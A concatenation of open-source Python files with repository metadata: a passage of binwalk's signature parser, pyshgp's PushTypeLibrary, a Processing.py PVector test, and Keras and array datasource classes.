                        elif line.operator == '~':
                            dvalue = ~opval
                        elif line.operator == '^':
                            dvalue ^= opval
                    except KeyboardInterrupt as e:
                        raise e
                    except Exception as e:
                        raise ParserException("Operation '" + str(dvalue) + " " + str(
                            line.operator) + "= " + str(line.opvalue) + "' failed: " + str(e))
                # Does the data (dvalue) match the specified comparison?
                if ((line.value is None) or
                    (line.regex and line.value.match(dvalue)) or
                    (line.condition == '=' and dvalue == line.value) or
                    (line.condition == '>' and dvalue > line.value) or
                    (line.condition == '<' and dvalue < line.value) or
                    (line.condition == '!' and dvalue != line.value) or
                    (line.condition == '~' and (dvalue == ~line.value)) or
                    (line.condition == '^' and (dvalue ^ line.value)) or
                    (line.condition == '&' and (dvalue & line.value)) or
                    (line.condition == '|' and (dvalue | line.value))):
                    # Up until this point, date fields are treated as integer values,
                    # but we want to display them as nicely formatted strings.
                    if line.type == 'date':
                        ts = datetime.datetime.utcfromtimestamp(dvalue)
                        dvalue = ts.strftime("%Y-%m-%d %H:%M:%S")
                    # Generate the tuple for the format string (one copy of
                    # dvalue per format specifier in the line's format string)
                    dvalue_tuple = ()
                    for x in self.fmtstr.finditer(line.format):
                        dvalue_tuple += (dvalue,)
                    # Format the description string
                    desc = line.format % dvalue_tuple
                    # If there was any description string, append it to the
                    # list of description string parts
                    if desc:
                        description.append(desc)
                    # Process tag keywords specified in the signature line. These have already been parsed out of the
                    # original format string so that they can be processed
                    # separately from the printed description string.
                    for (tag_name, tag_value) in binwalk.core.compat.iterator(line.tags):
                        # If the tag value is a string, try to format it
                        if isinstance(tag_value, str):
                            # Generate the tuple for the format string
                            dvalue_tuple = ()
                            for x in self.fmtstr.finditer(tag_value):
                                dvalue_tuple += (dvalue,)
                            # Format the tag string
                            tags[tag_name] = tag_value % dvalue_tuple
                        # Else, just use the raw tag value
                        else:
                            tags[tag_name] = tag_value
                        # Some tag values are intended to be integer values, so
                        # try to convert them as such
                        try:
                            tags[tag_name] = int(tags[tag_name], 0)
                        except KeyboardInterrupt as e:
                            raise e
                        except Exception as e:
                            pass
                    # Abort processing soon as this signature is marked invalid, unless invalid results
                    # were explicitly requested. This means that the sooner invalid checks are made in a
                    # given signature, the faster the scan can filter out false
                    # positives.
                    if not self.show_invalid and tags['invalid']:
                        break
                    # Look ahead to the next line in the signature; if its indent level is greater than
                    # that of the current line, then track the end of data for the current line. This is
                    # so that subsequent lines can use the '>>&0' offset syntax to specify relative offsets
                    # from previous lines.
                    try:
                        next_line = signature.lines[n + 1]
                        if next_line.level > line.level:
                            if line.type == 'string':
                                previous_line_end = line_offset + len(dvalue)
                            else:
                                previous_line_end = line_offset + line.size
                    except IndexError as e:
                        pass
                    # If this line satisfied its comparison, +1 the max
                    # indentation level
                    max_line_level = line.level + 1
                else:
                    # No match on the first line, abort
                    if line.level == 0:
                        break
                    else:
                        # If this line did not satisfy its comparison, then higher
                        # indentation levels will not be accepted.
                        max_line_level = line.level
        # Join the formatted description strings and remove backspace
        # characters (plus the preceding character as well)
        tags['description'] = self.bspace.sub('', " ".join(description))
        # This should never happen
        if not tags['description']:
            tags['display'] = False
            tags['invalid'] = True
        # If the formatted string contains non-printable characters, consider
        # it invalid
        if self.printable.match(tags['description']).group() != tags['description']:
            tags['invalid'] = True
        return tags
def match(self, data):
    '''
    Match the beginning of a data buffer to a signature.

    @data - The data buffer to match against the loaded signature list.

    Returns a list of SignatureResult objects.
    '''
    # A "match" is just a scan restricted to signatures anchored at the
    # very start of the buffer, i.e. with the searchable range capped at 1.
    return self.scan(data, dlen=1)
def scan(self, data, dlen=None):
    '''
    Scan a data block for matching signatures.

    @data - A string of data to scan.
    @dlen - If specified, signatures at offsets larger than dlen will be ignored.

    Returns a list of SignatureResult objects, sorted by offset (ascending).
    '''
    results = []
    # Offsets already claimed by a (higher-confidence) signature; used to
    # suppress overlapping lower-confidence matches below.
    matched_offsets = set()

    # Since data can potentially be quite a large string, make it available to other
    # methods via a class attribute so that it doesn't need to be passed around to
    # different methods over and over again.
    self.data = data

    # If dlen wasn't specified, search all of self.data
    if dlen is None:
        dlen = len(data)

    for signature in self.signatures:
        # Use regex to search the data block for potential signature
        # matches (fast)
        for match in signature.regex.finditer(data):
            # Take the offset of the start of the signature into account
            offset = match.start() - signature.offset
            # Signatures are ordered based on the length of their magic bytes (largest first).
            # If this offset has already been matched to a previous signature, ignore it unless
            # self.show_invalid has been specified. Also ignore obviously invalid offsets (<1)
            # as well as those outside the specified self.data range
            # (dlen).
            if (offset not in matched_offsets or self.show_invalid) and offset >= 0 and offset < dlen:
                # Analyze the data at this offset using the current
                # signature rule
                tags = self._analyze(signature, offset)
                # Generate a SignatureResult object and append it to the results list if the
                # signature is valid, or if invalid results were requested.
                if (not tags['invalid'] or self.show_invalid) and not self._filtered(
                        tags['description']):
                    # Only display results with the 'once' tag once.
                    if tags['once']:
                        if signature.title in self.display_once:
                            continue
                        else:
                            self.display_once.add(signature.title)
                    # Append the result to the results list
                    results.append(SignatureResult(**tags))
                    # Add this offset to the matched_offsets set, so that it can be ignored by
                    # subsequent loops.
                    matched_offsets.add(offset)

    # Sort results by offset
    results.sort(key=lambda x: x.offset, reverse=False)
    return results
def load(self, fname):
    '''
    Load signatures from a file.

    @fname - Path to signature file.

    Returns None.
    '''
    # Magic files must be ASCII, else encoding issues can arise.
    # Use a context manager so the file handle is released even if
    # reading or parsing raises (the original leaked the handle on
    # any exception between open() and close()).
    with open(fname, "r") as fp:
        lines = fp.readlines()
    self.parse(lines)
def parse(self, lines):
    '''
    Parse signature file lines.

    @lines - A list of lines from a signature file.

    Returns None.

    Raises a ParserException if an indented (continuation) line appears
    before any level-0 signature line.
    '''
    signature = None

    for line in lines:
        # Split at the first comment delimiter (if any) and strip the
        # result
        line = line.split('#')[0].strip()
        # Ignore blank lines and lines that are nothing but comments.
        # We also don't support the '!mime' style line entries.
        if line and line[0] != '!':
            # Parse this signature line
            sigline = SignatureLine(line)
            # Level 0 means the first line of a signature entry
            if sigline.level == 0:
                # If there is an existing signature, append it to the signature list,
                # unless the text in its title field has been filtered by user-defined
                # filter rules.
                if signature and not self._filtered(signature.title):
                    self.signatures.append(signature)
                # Create a new signature object; use the size of self.signatures to
                # assign each signature a unique ID.
                signature = Signature(len(self.signatures), sigline)
            # Else, just append this line to the existing signature
            elif signature:
                signature.lines.append(sigline)
            # If this is not the first line of a signature entry and there is no other
            # existing signature entry, something is very wrong with the
            # signature file.
            else:
                raise ParserException(
                    "Invalid signature line: '%s'" % line)

    # Add the final signature to the signature list.
    # Consistency fix: filter on signature.title, matching the in-loop
    # filtering above (previously this last check used
    # signature.lines[0].format, so the final signature was filtered
    # by a different field than all the others).
    if signature and not self._filtered(signature.title):
        self.signatures.append(signature)

    # Sort signatures by confidence (aka, length of their magic bytes),
    # largest first
    self.signatures.sort(key=lambda x: x.confidence, reverse=True)
| {
"repo_name": "sundhaug92/binwalk",
"path": "src/binwalk/core/magic.py",
"copies": "1",
"size": "38818",
"license": "mit",
"hash": 8389380352414143000,
"line_mean": 41.6103183315,
"line_max": 124,
"alpha_frac": 0.5197331135,
"autogenerated": false,
"ratio": 4.816726641022459,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 1,
"avg_score": 0.0009722471958266906,
"num_lines": 911
} |
"""A PushTypeLibrary describes the PushTypes which a given instance of PushGP will support."""
from typing import Any, Sequence, Tuple, Optional, Set, Callable
from pyshgp.push.types import PushType, CORE_PUSH_TYPES
from pyshgp.push.atoms import Atom, Literal
from pyshgp.validation import PushError
RESERVED_PSEUDO_STACKS = {"untyped", "stdout"}
class PushTypeLibrary(dict):
    """A collection of PushTypes which can support a corresponding PushStack.

    The library maps stack names (strings) to ``PushType`` objects. The
    pseudo-stacks in ``RESERVED_PSEUDO_STACKS`` cannot be registered or
    unregistered through the public API, while the "code" and "exec"
    stacks are always force-registered at construction time.

    Parameters
    ----------
    register_core : bool, optional
        If True, all core types will be registered. Default is True.
    *args
        A collection of PushTypes to register.
    """

    def __init__(self, register_core: bool = True, *args):
        super().__init__()
        if register_core:
            self.register_core()
        self.register_list(args)
        # "code" and "exec" hold arbitrary program Atoms and must always
        # exist, hence force=True.
        self.create_and_register("code", (Atom,), force=True)
        self.create_and_register("exec", (Atom,), force=True)

    def register(self, push_type: PushType, _force=False):
        """Register a PushType object.

        Parameters
        ----------
        push_type
            PushType to register.
        _force : bool, optional
            For internal use only. If True, reserved names are allowed.
            Default is False.

        Returns
        -------
        PushTypeLibrary
            A reference to the ``PushTypeLibrary``.

        Raises
        ------
        ValueError
            If the type's name is reserved and ``_force`` is False.
        """
        name = push_type.name
        if (not _force) and (name in RESERVED_PSEUDO_STACKS):
            raise ValueError("Cannot register PushType with name {nm} because it is reserved.".format(nm=name))
        self[name] = push_type
        return self

    def create_and_register(self,
                            name: str,
                            python_types: Tuple[type, ...],
                            is_collection: bool = False,
                            is_numeric: bool = False,
                            force=False):
        """Create a PushType and register it into the library.

        Parameters
        ----------
        name : str
            A name for the type. Used when referencing the PushType in
            Instruction definitions and will be the key in the PushState
            for the corresponding PushStack.
        python_types : Tuple[type]
            A tuple of python types that correspond to the underlying
            native types which the PushType is representing.
        is_collection : bool, optional
            Indicates if the PushType is a collection. Default is False.
        is_numeric : bool, optional
            Indicates if the PushType is a number. Default is False.
        force : bool
            If True, will register the type even if it will overwrite an
            existing reserved stack type (eg. exec, stdout, untyped).
            Default is False. It is not recommended this argument be
            changed unless you have a very good reason to do so.

        Returns
        -------
        PushTypeLibrary
            A reference to the PushTypeLibrary.
        """
        p_type = PushType(name, python_types, is_collection=is_collection, is_numeric=is_numeric)
        self.register(p_type, _force=force)
        return self

    def unregister(self, push_type_name: str):
        """Unregister a push type by name.

        Unregistering a name that is not present is a no-op.

        Parameters
        ----------
        push_type_name
            The name of the push type to unregister.

        Returns
        -------
        PushTypeLibrary
            A reference to the PushTypeLibrary.

        Raises
        ------
        ValueError
            If the name is reserved.
        """
        if push_type_name in RESERVED_PSEUDO_STACKS:
            raise ValueError("Cannot unregister PushType with name {nm} because it is reserved.".format(nm=push_type_name))
        self.pop(push_type_name, None)
        return self

    def register_list(self, list_of_push_types: Sequence[PushType]):
        """Register a list of PushType objects.

        Parameters
        ----------
        list_of_push_types
            List of PushType objects to register.

        Returns
        -------
        PushTypeLibrary
            A reference to the PushTypeLibrary.
        """
        for push_type in list_of_push_types:
            self.register(push_type)
        return self

    def register_core(self):
        """Register all core PushTypes defined in pyshgp.

        Returns
        -------
        PushTypeLibrary
            A reference to the PushTypeLibrary.
        """
        for push_type in CORE_PUSH_TYPES:
            self.register(push_type)
        # Fix: the docstring promises a reference to the library, but the
        # method previously returned None, breaking call chaining.
        return self

    def supported_stacks(self) -> Set[str]:
        """All stack names which the PushTypeLibrary can support.

        Returns
        -------
        set[str]
            A set of stack names which the type library can support.
        """
        return set(self.keys())

    def push_type_of(self, thing: Any, error_on_not_found: bool = False) -> Optional[PushType]:
        """Return the PushType of the given thing.

        Parameters
        ----------
        thing : Any
            Any value to try and find the corresponding PushType.
        error_on_not_found : bool, optional
            If True, will raise error if no PushType found. Default is False.

        Returns
        -------
        Optional[PushType]
            The corresponding PushType of the thing. If no corresponding
            type, returns None.
        """
        for push_type in self.values():
            if push_type.is_instance(thing):
                return push_type
        if error_on_not_found:
            raise PushError.no_type(thing)
        return None

    def push_type_for_type(self, typ: type, error_on_not_found: bool = False) -> Optional[PushType]:
        """Return the PushType of the given python (or numpy) type.

        Parameters
        ----------
        typ : type
            Any type to try and find the corresponding PushType.
        error_on_not_found : bool, optional
            If True, will raise error if no PushType found. Default is False.

        Returns
        -------
        Optional[PushType]
            The corresponding PushType of the given type. If no
            corresponding type, returns None.
        """
        for push_type in self.values():
            if typ in push_type.python_types:
                return push_type
        if error_on_not_found:
            raise PushError.no_type(typ)
        return None
def infer_literal(val: Any, type_library: PushTypeLibrary) -> Literal:
    """Make a literal by inferring the PushType of the value.

    Parameters
    ----------
    val : Any
        Any value to try and make a Literal out of.
    type_library : PushTypeLibrary
        The library of PushTypes which a Literal can be made of.

    Returns
    -------
    Literal
        The Literal object which holds the value and the corresponding
        PushType.
    """
    # Resolve the PushType first; an unknown value raises inside the
    # library rather than silently producing an untyped literal.
    push_type = type_library.push_type_of(val, error_on_not_found=True)
    return Literal(value=val, push_type=push_type)
| {
"repo_name": "erp12/pyshgp",
"path": "pyshgp/push/type_library.py",
"copies": "1",
"size": "7063",
"license": "mit",
"hash": -705865184801138000,
"line_mean": 30.9592760181,
"line_max": 123,
"alpha_frac": 0.585728444,
"autogenerated": false,
"ratio": 4.586363636363636,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.5672092080363637,
"avg_score": null,
"num_lines": null
} |
# Test-suite for the PVector class (Python 2 / Jython syntax).
# NOTE: the assertions below mutate a, b, c in sequence, so statement
# order is significant throughout.

# Default constructor yields the zero vector.
a = PVector()
assert a.x == 0
assert a.y == 0
assert a.z == 0
# Subtraction, both operand orders.
a = PVector(5, 7, 11)
b = PVector(13, 17, 23)
assert a - b == PVector(-8.0, -10.0, -12.0)
assert b - a == PVector(8, 10, 12)
# Addition: operator, static form, and in-place method.
c = PVector(18, 24, 34)
assert b + a == c
assert a + b == c
assert PVector.add(a, b) == c
assert PVector.add(a, b) == c
a.add(b)
assert a == c
a.add(b)
assert a == PVector(31.0, 41.0, 57.0)
# Vector * vector must be rejected with a TypeError.
try:
    print a * b
    raise AssertionError("That shouldn't have happened.")
except TypeError:
    pass
# Scalar multiplication: operator, static form, and in-place method.
c = PVector(310.0, 410.0, 570.0)
assert a * 10 == c
assert a * 10 == c
assert PVector.mult(a, 10) == c
assert PVector.mult(a, 10) == c
a.mult(10)
assert a == c
# Distance, cross product, and dot product.
assert int(1000 * PVector.dist(a, b)) == 736116
assert PVector.cross(a, b) == PVector(-260.0, 280.0, -60.0)
assert a.cross(b) == PVector(-260.0, 280.0, -60.0)
assert PVector.dot(a, b) == 0
# Augmented assignment operators on a copy (get()).
d = a.get()
d += b
assert d == a + b
d = a.get()
d -= c
assert d == a - c
d = a.get()
d *= 5.0
assert d == a * 5.0
d = a.get()
d /= 5.0
assert d == a / 5.0
# int and float scalars must behave identically.
assert b * 5 == b * 5.0
assert b / 5 == b / 5.0
d = b.get()
d *= 391
assert d == b * 391.0
d = b.get()
d /= 10203
assert d == b / 10203.0
d = a.get()
d += a + a
assert d == a + a + a
# Scalar multiplication commutes; division by s equals multiplying by 1/s.
assert a * 57.0 == 57.0 * a
assert (a / 5.0) == (1.0 / 5.0) * a
# Compound expression must not mutate its operands (m, n alias b, c).
m, n = b, c
a += b * 5 - c / 2 + PVector(0, 1, 2)
assert (m, n) == (b, c)
# deepcopy produces independent vectors.
import copy
x = [a, b]
y = copy.deepcopy(x)
assert x == y
x[0].sub(PVector(100, 100, 100))
assert x != y
# Comparisons order by magnitude, not componentwise.
a = PVector(1, 1)
b = PVector(-2, -2)
assert a < b
assert a <= b
assert b > a
assert b >= a
a = PVector(1, 2, 3)
b = PVector(3, 2, 1)
assert a != b
assert a >= b
assert b >= a
assert a.magSq() == b.magSq()
# Angle between two vectors (exact float expected on this platform).
v1 = PVector(10, 20);
v2 = PVector(60, 80);
a = PVector.angleBetween(v1, v2);
assert a == 0.17985349893569946 # more or less
# Regression test for https://github.com/jdf/Processing.py-Bugs/issues/67
assert isinstance(PVector(1,2), PVector)
# Regression test for https://github.com/jdf/Processing.py-Bugs/issues/101
v = PVector(10, 20, 0)
d = v.dot(60, 80, 0)
assert d == 2200.0
v2 = PVector(60, 80, 0)
d = v.dot(v2)
assert d == 2200.0
# PVector.add w/multiple arguments
v = PVector(40, 20, 0)
v.add(25, 50, 0)
assert (v.x, v.y, v.z) == (65, 70, 0)
# PVector.sub w/multiple arguments
v = PVector(40, 20, 0)
v.sub(25, 50, 0)
assert (v.x, v.y, v.z) == (15, -30, 0)
# Regression test for https://github.com/jdf/Processing.py-Bugs/issues/102
start = PVector(0.0, 0.0)
end = PVector(100.0, 100.0)
middle = PVector.lerp(start, end, 0.5)
assert middle == PVector(50.0, 50.0)
assert start == PVector(0, 0)
start.lerp(end, .75)
assert start == PVector(75, 75)
assert end == PVector(100.0, 100.0)
end.lerp(200, 200, 0, .5)
assert end == PVector(150.0, 150.0)
print 'OK'
exit()
| {
"repo_name": "mashrin/processing.py",
"path": "testing/resources/test_pvector.py",
"copies": "3",
"size": "2710",
"license": "apache-2.0",
"hash": -8453459603405174000,
"line_mean": 19.0740740741,
"line_max": 74,
"alpha_frac": 0.5926199262,
"autogenerated": false,
"ratio": 2.203252032520325,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.9285888758381979,
"avg_score": 0.0019966400676691156,
"num_lines": 135
} |
"""A :py:class:`Datasource` based on predefined keras datasets.
"""
# Generic imports
import os.path
import importlib.util
# cifar10 and cifar100 labels are provided as pickled files
# FIXME[todo]: Six: Python 2 and 3 Compatibility Library - do we need this?
# From the docs: ""Some modules which had two implementations have
# been merged in Python 3. For example, cPickle no longer exists in
# Python 3; it was merged with pickle. In these cases, fetching the
# fast version will load the fast one on Python 2 and the merged
# module in Python 3.""
# from six.moves import cPickle
import pickle
# toolbox imports
from dltb.datasource import Imagesource
from dltb.datasource.array import LabeledArray
from dltb.tool.classifier import ClassScheme
# FIXME[old]: may be this could still be used somehow to check which
# dataset is available ...
# for keras_id in KerasDatasource.KERAS_IDS:
# try:
# KerasDatasource(keras_id)
# except ValueError as err:
# LOG.error("Error instantiating keras data source '%s': %s",
# keras_id, err)
class KerasScheme(ClassScheme):
    """:py:class:`ClassScheme` for Keras datasources.

    This class adds functionality to load class schemes for
    keras datasources 'cifar10' and 'cifar100'.
    """

    def __init__(self, *args, name: str = None, variant: str = None,
                 **kwargs) -> None:
        """
        Arguments
        ---------
        name: str
            The name of the Keras dataset that applies this Scheme.
        variant: str
            Label variant to use; only relevant for 'cifar100'
            ('fine' or 'coarse').
        """
        super().__init__(*args, **kwargs)
        self._keras_name = name
        self._variant = variant

    @property
    def prepared(self) -> bool:
        """Check if the scheme has been initialized (labels loaded).
        """
        return len(self) > 0

    def prepare(self) -> None:
        """Prepare the labels for a Keras dataset.

        Loads textual label names from the (pickled) metadata files
        that Keras downloads alongside the cifar datasets.
        """
        if self.prepared:
            return  # nothing to do ...
        #
        # Set the labels
        #
        if self._keras_name == 'cifar10':
            # NOTE(review): these numeric-string labels are registered
            # under the name 'text', and the branch below registers the
            # real cifar10 label names under the same name -- confirm
            # whether this double add_labels call is intentional.
            self.add_labels([str(i) for i in range(10)], 'text')

        # Lazy import: keras may not be installed in every environment.
        data_utils = importlib.import_module('keras.utils.data_utils')

        # Textual labels are provided in different ways for the different
        # Keras datasets.
        if self._keras_name == 'cifar10':
            # NOTE(review): get_file is called with origin=None here;
            # presumably the archive was already downloaded by
            # keras.datasets -- verify this cannot trigger a failing
            # download attempt.
            path = data_utils.get_file('cifar-10-batches-py', None)
            with open(os.path.join(path, "batches.meta"), 'rb') as file:
                meta = pickle.load(file)
            self.add_labels(meta['label_names'], name='text')
        elif self._keras_name == 'cifar100':
            path = data_utils.get_file('cifar-100-python', None)
            with open(os.path.join(path, "meta"), 'rb') as file:
                meta = pickle.load(file)
            if self._variant is None or self._variant == 'fine':
                self.add_labels(meta['fine_label_names'], 'text')
            elif self._variant == 'coarse':
                # there is also 'coarse_label_names' with 20 categories
                # label [0..100] -> label//5 [0..20]
                self.add_labels(meta['coarse_label_names'], 'text')
class KerasDatasource(LabeledArray, Imagesource):
    # pylint: disable=too-many-ancestors
    """Data source for Keras builtin datasets [1].

    Keras provides some methods to access standard datasets via its
    keras.datasets API. This API will automatically download and
    unpack required data into `${KERAS_HOME}/datasets/` (if not set,
    ${KERAS_HOME} defaults to `~/.keras/`; currently there seems to be
    no option to specify the download directory for individual
    datasets).

    Attributes
    ----------
    **Class Attributes**

    KERAS_IDS: list
        A list of valid names for :py:class:`KerasDatasource`\\ s.
        For each name there has to exist a package called
        keras.datasets.{name}.
    KERAS_DATA: dict
        A dictionary holding all loaded keras datasets.
        Maps the ID of the dataset to the actual data.
        The Keras data are provided as a pair of pairs of arrays:
            (x_train, y_train), (x_test, y_test)
        That is: data[0][0] are the input data from the training set
        and data[0][1] are the corresponding labels.
        data[1][0] and data[1][1] are test data and labels.

    **Instance Attributes**

    _keras_dataset_name: str
        The name of the Keras dataset (one of those listed in
        KERAS_IDS).
    _section_index: int
        Index for the section of the dataset: 0 for train and 1 for test.

    Links
    -----
    [1] https://keras.io/api/datasets/
    """
    KERAS_IDS = ['mnist', 'cifar10', 'cifar100', 'fashion_mnist']
    KERAS_DATA = {}

    # Name of the underlying keras dataset (set in __init__).
    _keras_dataset_name: str = None
    # 0 = train section, 1 = test section.
    _section_index: int = 0
    # cifar100 label variant ('fine' or 'coarse'); None otherwise.
    _variant: str = None

    def __init__(self, name: str, section: str = 'train',
                 key: str = None, **kwargs) -> None:
        """Initialize a keras dataset.

        Arguments
        ---------
        name: str
            Name of the Keras dataset. This can be any name listed
            in KERAS_IDS.
        section: str
            The section of the dataset, either 'train' or 'test'.
            Any value other than 'train' selects the test section.
        key: str
            Optional unique key; defaults to "{name}-{section}".

        Raises
        ------
        ValueError:
            There does not exist a package keras.datasets.{name}.
        """
        scheme = KerasScheme(name=name)
        # NOTE(review): "Datasoure" below is a typo, but it is part of a
        # runtime string and therefore left untouched here.
        super().__init__(key=key or f"{name}-{section}",
                         description=f"Keras Datasoure '{name}-{section}'",
                         **kwargs)
        self._keras_dataset_name = name
        self._section_index = 0 if section == 'train' else 1
        self._scheme = scheme

    @property
    def keras_dataset_name(self) -> str:
        """The name of the Keras dataset.
        """
        return self._keras_dataset_name

    @property
    def keras_module_name(self) -> str:
        """Fully qualified name of the keras module representing this dataset.
        """
        return 'keras.datasets.' + self._keras_dataset_name

    def _preparable(self) -> bool:
        """Check if this Datasource is available.

        Returns
        -------
        True if the Datasource can be instantiated, False otherwise.
        """
        module_spec = importlib.util.find_spec(self.keras_module_name)
        # NOTE(review): `super()._preparable` is referenced without
        # parentheses; if the parent defines it as a method (not a
        # property) this is a bound-method object and always truthy --
        # confirm against the Datasource base class.
        return module_spec is not None and super()._preparable

    def _prepare(self):
        """Prepare this :py:class:`KerasDatasource`.

        This includes importing the corresponding keras module and
        loading data (and label names if available). Loaded data are
        cached class-wide in KERAS_DATA.
        """
        super()._prepare()
        name = self._keras_dataset_name
        if name not in self.KERAS_DATA:
            module = importlib.import_module(self.keras_module_name)
            self.KERAS_DATA[name] = module.load_data()
        self._array, self._labels = self.KERAS_DATA[name][self._section_index]
        self._description = f'keras.datasets.{name}'
        if name == 'cifar100':
            # there exist two variants of the cifar100 dataset:
            # the "fine" one with 100 labels and a "coarse" one with
            # only 20 labels.
            self._variant = 'fine'
        # NOTE(review): the preceding block unconditionally sets
        # _variant to 'fine' for cifar100, which makes the 'coarse'
        # branch below unreachable -- confirm intended behavior.
        if name == 'cifar100' and self._variant == 'coarse':
            # FIXME[todo]: we have to find the mapping from "fine"
            # labels to "coarse" labels as provided on
            # https://www.cs.toronto.edu/~kriz/cifar.html
            self._labels = self._labels//5

    def __str__(self):
        # return Predefined.__str__(self) + ': ' + DataArray.__str__(self)
        # return self._keras_dataset_name + ': ' + DataArray.__str__(self)
        return "Keras Dataset: " + self._keras_dataset_name
| {
"repo_name": "Petr-By/qtpyvis",
"path": "dltb/thirdparty/keras/datasource.py",
"copies": "1",
"size": "7668",
"license": "mit",
"hash": -2493869317927171000,
"line_mean": 33.5405405405,
"line_max": 78,
"alpha_frac": 0.5953312467,
"autogenerated": false,
"ratio": 3.938366718027735,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.5033697964727735,
"avg_score": null,
"num_lines": null
} |
"""A :py:class:`Datasource` providing data from an array.
"""
# FIXME[todo]: add the option to work with numpy memmap
# np.memmap(filename, dtype='float32', mode='w+',
# shape=(samples,) + network[layer].output_shape[1:])
#
# Notice: the filen referred to by filename has to by an
# (uncompressed) `.npy` file. There is not way to use compressed `.npz`
# files.
# third party imports
import numpy as np
# toolbox imports
from ..base.data import Data
from ..tool.classifier import ClassScheme, ClassIdentifier
from .datasource import Labeled, Indexed
class DataArray(Indexed):
    # pylint: disable=too-many-ancestors
    """A ``DataArray`` stores all entries in an array (like the MNIST
    character data). That means that all entries will have the same sizes.

    Attributes
    ----------
    _array: np.ndarray
        An array of input data. Can be ``None`` (unprepared state).
    """

    def __init__(self, array: np.ndarray = None, description: str = None,
                 **kwargs):
        """Create a new DataArray.

        Parameters
        ----------
        array: np.ndarray
            Numpy data array
        description: str
            Description of the data set
        """
        super().__init__(**kwargs)
        self._array = array
        self._description = description

    def __len__(self):
        # An unprepared DataArray reports length 0.
        return 0 if self._array is None else len(self._array)

    def __str__(self):
        shape = None if self._array is None else self._array.shape
        return f'<DataArray "{shape}">'

    def _get_description(self, index: int = None, **kwargs) -> str:
        """Provide a description of the Datasource or one of its
        elements.

        Attributes
        ----------
        index: int
            Provide a description of the datapoint for that index.
        """
        description = super()._get_description(**kwargs)
        if index is not None:
            description = 'Image ' + str(index) + ' from ' + description
        return description

    #
    # Preparation
    #

    def _prepared(self) -> bool:
        """A :py:class:`DataArray` is prepared once the array
        has been initialized.
        """
        return super()._prepared() and (self._array is not None)

    def _unprepare(self) -> None:
        """A :py:class:`DataArray` is reset in an unprepared state
        by releasing the array.
        """
        # Release the array before delegating, so the superclass sees
        # this instance as unprepared.
        self._array = None
        super()._unprepare()

    #
    # Data
    #

    def _get_meta(self, data: Data, **kwargs) -> None:
        # pylint: disable=arguments-differ
        """Get data from this :py:class:`Datasource`\\ .
        """
        # The per-item shape is the array shape minus the leading
        # (index) dimension. Assumes the array is prepared.
        data.add_attribute('shape', value=self._array.shape[1:])
        super()._get_meta(data, **kwargs)

    def _get_batch(self, data: Data, index: int = None, **kwargs) -> None:
        # pylint: disable=arguments-differ
        # Slice a contiguous batch starting at `index`; the batch size
        # is taken from len(data).
        if index is not None:
            data.array = self._array[index:index+len(data)]
        super()._get_batch(data, index=index, **kwargs)

    def _get_index(self, data: Data, index: int, **kwargs) -> None:
        # Fetch a single datapoint; an out-of-range index propagates
        # numpy's IndexError.
        data.array = self._array[index]
        super()._get_index(data, index, **kwargs)
class LabeledArray(DataArray, Labeled):
    # pylint: disable=too-many-ancestors
    """An array datasource with one label per entry.

    Attributes
    ----------
    _labels: np.ndarray
        An array mapping indices (of the data array) to labels.
        ``None`` until labels have been prepared.
    """

    _labels: np.ndarray = None

    @property
    def labels_prepared(self) -> bool:
        """Check if labels for this dataset have been prepared.
        """
        return self._labels is not None

    def _prepare_labels(self, labels: np.ndarray = None) -> None:
        """Set the labels for this labeled Array datasource.

        Arguments
        ---------
        labels: np.ndarray
            An array containing the labels for this datasource. Should
            have the same length as the data array.

        Raises
        ------
        ValueError:
            No labels were given, or their number does not match the
            number of data points.
        """
        if labels is None:
            raise ValueError("You have to provide a labels array when "
                             "preparing a LabeledArray.")
        if len(self) != len(labels):
            raise ValueError("Wrong number of target values: "
                             f"expect={len(self)}, got={len(labels)}")
        self._labels = labels

    def _set_labels(self, labels: np.ndarray,
                    scheme: ClassScheme = None) -> None:
        """Set the labels for this :py:class:`LabeledArray`. The labels
        will be stored as numpy array, allowing for some of the
        convenient numpy indexing techniques.

        Arguments
        ---------
        labels:
            The labels for this :py:class:`LabeledArray`. Depending
            on the type of datasource, this could be (numeric) class
            indices, but could also be other kind of labels, like
            list of bounding boxes. The crucial point is that there
            should be one label for each data point in the datasource,
            and the order of labels has to correspond to the order
            of datapoints.
        scheme:
            If not `None`, `labels` are considered as class labels,
            that is identifiers of classes in that :py:class:`ClassScheme`.
            Such labels will be stored as an numpy array of
            :py:class:`ClassIdentifier`.
        """
        if scheme is None:
            self._labels = labels
        else:
            self._scheme = scheme
            # Fix: size the label array by the given labels. The
            # previous code referenced `self._lfw_people.target` (a
            # copy-paste leftover from the LFW datasource), which
            # raised AttributeError whenever a scheme was supplied.
            self._labels = np.empty(len(labels), dtype=object)
            for index, label in enumerate(labels):
                self._labels[index] = \
                    ClassIdentifier(label, scheme=scheme)

    def _get_meta(self, data: Data, **kwargs) -> None:
        """Get data from this :py:class:`Datasource`\\ .
        """
        data.add_attribute('label', batch=True)
        super()._get_meta(data, **kwargs)

    def _get_batch(self, data: Data, **kwargs) -> None:
        """Get data from this :py:class:`Datasource`\\ .
        """
        # Let the superclass fill in data.index first; then attach the
        # matching labels (or None if labels are not prepared).
        super()._get_batch(data, **kwargs)
        data.label = self._labels[data.index] if self.labels_prepared else None

    def _get_index(self, data, index: int, **kwargs) -> None:
        """
        Raises
        ------
        IndexError:
            The index is out of range.
        """
        super()._get_index(data, index, **kwargs)
        label = self._labels[index] if self.labels_prepared else None
        data.label = label

    def _get_description(self, index: int = None, short: bool = False,
                         with_label: bool = False, **kwargs) -> str:
        # pylint: disable=arguments-differ
        """Provide a description of the Datasource or one of its
        elements.

        Attributes
        ----------
        index: int
            In case of an indexed Datasource, provide a description
            of the given element.
        short: bool
            If True, omit the label information.
        with_label: bool
            If True (and an index is given), include the element's label
            in the description.
        """
        if index and with_label:
            description = super()._get_description(index=index, **kwargs)
            if not short:
                if self.labels_prepared:
                    # Fix: this was a plain string literal, so the
                    # "{self._labels[index]}" placeholder was emitted
                    # verbatim; it is now an f-string.
                    description += f" with label {self._labels[index]}"
                else:
                    description += ", no label available"
        else:
            description = super()._get_description(with_label=with_label,
                                                   **kwargs)
        return description
| {
"repo_name": "Petr-By/qtpyvis",
"path": "dltb/datasource/array.py",
"copies": "1",
"size": "7425",
"license": "mit",
"hash": -9157966182380185000,
"line_mean": 32.5972850679,
"line_max": 79,
